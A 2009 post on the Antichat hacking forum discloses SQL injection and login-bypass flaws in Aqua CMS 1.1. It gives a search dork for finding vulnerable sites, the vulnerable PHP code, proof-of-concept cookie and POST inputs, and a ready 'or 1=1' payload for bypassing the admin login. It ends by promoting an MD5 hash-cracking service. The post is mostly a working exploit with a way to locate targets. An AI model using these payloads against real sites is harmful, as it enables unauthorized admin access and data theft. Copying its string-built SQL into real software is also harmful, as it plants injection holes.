ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 15.04.2009, 14:35
Аватар для halkfild
halkfild
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию

Found : halkfild
Dork : "Powered By Aqua Cms"
Vendor: http://www.aquacms.net/
Advisory URL: http://crackfor.me/bugtraq/aquacms.v1.1.txt
Mail : bugtraq[d0g]crackfor.me


SQL-injections:
Need:
magic quotes = off


vuln file: /droplets/functions/base.php
vuln code:

PHP код:
65:// Check the status of the orders

if(isset($_COOKIE["userSID"])) {
$sqltable $sitename."_orders";
$selck $_COOKIE["userSID"];
mysql_select_db($database$dbconnect);
$query_cartcheck "SELECT SID FROM $sqltable WHERE SID = '$selck' AND status = 1";    
$cartcheck mysql_query($query_cartcheck$dbconnect) or die(mysql_error());
$row_cartcheck mysql_fetch_assoc($cartcheck);
$totalRows_cartcheck mysql_num_rows($cartcheck);

if (
$totalRows_cartcheck != 0) {
    
$user_ip_address $_SERVER['REMOTE_ADDR'];
    
$dt=date("YmdHis"); 
    
$UID="$dt$user_ip_address";
    
setcookie("userSID"$UIDtime()+36000);
}


PoC: COOKIE: userSID='[foo]

Auth bypass
Need:
magic quotes = off

vuln file: /admin/index.php
vuln code:

PHP код:
10:
if (isset(
$_POST['username']) == TRUE) {
    
$uusername $_POST['username'];
    
$upassword $_POST['password'];
    
$sqltable $sitename."_users";
    
mysql_select_db($database$dbconnect);
    
$query_getuser "
    SELECT * 
    FROM 
$sqltable 
    WHERE username = '
$uusername
    AND password = '
$upassword
    AND groups != '' 
    "
;
    
$getuser mysql_query($query_getuser$dbconnect) or die("Unable to select database");
    
$row_getuser mysql_fetch_assoc($getuser);
    
$totalRows_getuser mysql_num_rows($getuser);
    
    if (
$totalRows_getuser == 1) {
        
$uid $row_getuser['id'];
        
$uun $row_getuser['username'];
        
$ugr $row_getuser['groups'];
        
$setwsuser $uid.":".$uun.":".$ugr
        
//setcookie("wsuser", $setwsuser, time()+36000, '/');
        //header("Location: index.php");
    

    
// User logon: end


PoC: POST: username='[foo]
Exploit: POST: username=crackfor.me'+or+1=1+limit+1+--+


p.s. for cracking md5 hashes use http://crackfor.me - online md5 crack service (:
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30
Основные методы взлома и защиты скриптов на Php DIAgen Авторские статьи 8 28.05.2006 12:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ